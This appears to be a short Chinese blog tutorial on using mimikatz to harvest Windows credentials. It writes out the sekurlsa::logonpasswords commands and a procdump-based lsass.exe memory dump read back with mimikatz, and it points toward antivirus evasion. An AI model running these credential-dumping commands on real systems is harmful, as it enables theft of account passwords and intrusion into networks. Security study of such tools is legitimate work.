使用mimikatz获取账号密码

事由

翻看以前的文件夹突然看到mimikatz,突然想到之前遇到过一个挖矿的传染病毒,python2.7写的,几千行太多了,当时就懒得仔细看,毕竟都是源代码。好像里面有这个模块,就随便写了写,mimikatz主要也是用于内网渗透,密码收集的吧

image-20220524140354511

image-20220524135921116

mimikatz简介

mimikatz是法国人Benjamin Delpy编写的一款轻量级的调试工具,在内网渗透过程中,它多数时候是作为一款抓取用户口令的工具,属于内网渗透必备工具之一,被很多人称之为密码抓取神器。然而Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递,甚至伪造域管理凭证令牌等诸多功能。

https://github.com/gentilkiwi/mimikatz/

使用mimikatz直接获取账号密码

mimikatz读取明文密码和hash时需要管理员权限

然后依次执行

1
2
3
4
5
privilege::debug                //提升至debug权限
sekurlsa::logonpasswords //抓取密码

或者
mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" > pssword.txt exit //结果输出到pssword.txt
屏幕截图095447

Windows10比较麻烦,执行命令后需要将相应SHA1值解密,获取密码

(网上有人说可以通过修改注册表的方式抓取明文,尝试后发现显示 _TBAL_并没有显示明文密码,不知道哪里出的问题)

屏幕截图101038

解码网站:https://www.somd5.com/

image-20220524102018844

Procdump+mimikatz配合抓取密码

mimikatz容易被杀软查杀,而Procdump是微软官方的应用程序,文件本身不会被查杀

但测试过程中执行相应命令,Microsoft Defender报毒

屏幕截图103254

所以之后还要重点考虑mimikatz的免杀策略,网上有很多相应的文章

采用Procdump获取内存文件lsass.exe进程 (它用于本地安全和登陆策略) 中存储的登录密码并转储到lsass.dmp文件中,之后我们就可以使用mimikatz去读取lsass.dmp获取到密码

生成转储文件lsass.dmp

1
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
屏幕截图103347

mimikatz读取转储文件

1
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"
屏幕截图103717

然后就可以解码得到的SHA1值

工具很强大不搞渗透简单了解一下算了


使用mimikatz获取账号密码
http://wangchenchina.github.io/2022/05/24/使用mimikatz获取账号密码/
作者
Demo
发布于
2022年5月24日
许可协议